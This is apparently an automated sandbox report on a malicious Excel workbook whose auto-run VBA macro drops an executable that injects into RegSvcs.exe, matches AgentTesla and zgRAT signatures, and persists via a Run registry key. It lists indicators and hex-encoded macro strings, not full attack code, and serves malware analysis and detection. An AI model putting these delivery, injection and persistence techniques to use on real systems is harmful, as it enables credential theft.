Document contains an embedded VBA with functions possibly related to HTTP operations
Source: 00001.LPCD2022.xls Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send, setrequestheader
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send, setrequestheader Name: cjpojbxatghyew
Document contains an embedded VBA macro with suspicious strings
Source: 00001.LPCD2022.xls OLE, VBA macro line: xdgiejom = Environ("TEMP") & "\" & xdgiejom
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, String environ: xdgiejom = Environ("TEMP") & "\" & xdgiejom Name: cjpojbxatghyew
Document contains an embedded VBA with hexadecimal encoded strings
Source: 00001.LPCD2022.xls Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found hex strings
Source: 00001.LPCD2022.xls Stream path '_VBA_PROJECT_CUR/VBA/vzbprmttn' : found hex strings
Source: 00001.LPCD2022.xls Stream path '_VBA_PROJECT_CUR/VBA/yhrgaijdj' : found hex strings
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, String 4d53584d4c322e5365727665
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, String 4d6f7a696c6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e542035
Source: VBA code instrumentation OLE, VBA macro: Module vzbprmttn, Function wdzlbznhf, String 77696e6d676d74733a5c5c
Source: VBA code instrumentation OLE, VBA macro: Module vzbprmttn, Function wdzlbznhf, String 77696e6d676d74733a5c5c2e5c726f6f745c63696d76323a57696e33325f
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Code function: 2_2_002D2428 2_2_002D2428
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Code function: 2_2_002D25C1 2_2_002D25C1
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Code function: 2_2_002D69C8 2_2_002D69C8
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Code function: 2_2_002D65A0 2_2_002D65A0
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Code function: 2_2_002D7B38 2_2_002D7B38
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Code function: 2_2_007F1347 2_2_007F1347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_003ECA08 3_2_003ECA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_003E4320 3_2_003E4320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_003E4668 3_2_003E4668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_003E4F38 3_2_003E4F38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_003EE778 3_2_003EE778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_003ED780 3_2_003ED780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_003E1630 3_2_003E1630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_006248AA 3_2_006248AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00626928 3_2_00626928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00624DF0 3_2_00624DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0062CE70 3_2_0062CE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0062A347 3_2_0062A347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0062C330 3_2_0062C330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00629E66 3_2_00629E66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0062CAF0 3_2_0062CAF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0062A3C0 3_2_0062A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00620B88 3_2_00620B88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_006E5818 3_2_006E5818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_006E2301 3_2_006E2301
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Yara signature match
Source: 3.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.38fb8f8.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.38c70d8.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 00001.LPCD2022.xls OLE, VBA macro line: Sub Workbook_Open()
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open Name: Workbook_Open
Document contains embedded VBA macros
Source: 00001.LPCD2022.xls OLE indicator, VBA macros: true
Source: dropped.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\dropped.exe File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLS@6/4@26/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: 00001.LPCD2022.xls OLE indicator, Workbook stream: true
Source: 00001.LPCD2022.xls Virustotal: Detection: 60%
Source: 00001.LPCD2022.xls ReversingLabs: Detection: 60%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\dropped.exe C:\Users\user\AppData\Local\Temp\dropped.exe
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe "C:\Users\user\AppData\Roaming\BINGO\BINGO.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe "C:\Users\user\AppData\Roaming\BINGO\BINGO.exe"
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6086.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Mutant created: \Sessions\1\BaseNamedObjects\xpKNGhplpShlV
Source: 3.2.RegSvcs.exe.400000.0.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.2.RegSvcs.exe.400000.0.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.0.RegSvcs.exe.400000.4.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.0.RegSvcs.exe.400000.4.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.0.RegSvcs.exe.400000.0.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.0.RegSvcs.exe.400000.0.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\dropped.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: RegSvcs.pdb source: BINGO.exe, BINGO.exe, 00000006.00000000.959068378.0000000000E02000.00000020.00000001.01000000.00000008.sdmp, BINGO.exe, 00000006.00000002.961292531.0000000000E02000.00000020.00000001.01000000.00000008.sdmp, BINGO.exe.3.dr

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: dropped.exe.0.dr, Ug/Va.cs .Net Code: PQe contains xor as well as GetObject
Source: dropped.exe.0.dr, Ug/Va.cs .Net Code: tfA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Code function: 2_2_007F50C7 pushfd ; ret 2_2_007F50C8
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Code function: 2_2_007F72F0 push eax; retn 005Eh 2_2_007F72F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_003E03B9 pushfd ; retf 001Ch 3_2_003E0421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_003E03E2 pushfd ; retf 001Ch 3_2_003E0421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_003E26D0 push 14003D37h; retf 3_2_003E26D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00624D50 push eax; iretd 3_2_00624D91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00624DA0 pushad ; iretd 3_2_00624DE1
Source: initial sample Static PE information: section name: .text entropy: 7.86212546256

Persistence and Installation Behavior
barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File created: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\dropped.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run BINGO Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run BINGO Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
